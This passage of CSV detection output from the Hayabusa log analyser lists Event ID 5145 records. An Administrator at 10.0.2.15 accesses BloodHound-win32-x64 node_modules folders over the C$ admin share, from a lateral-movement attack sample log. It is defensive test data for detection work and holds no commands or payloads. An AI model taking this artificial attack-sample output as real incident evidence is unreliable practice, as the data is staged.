0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
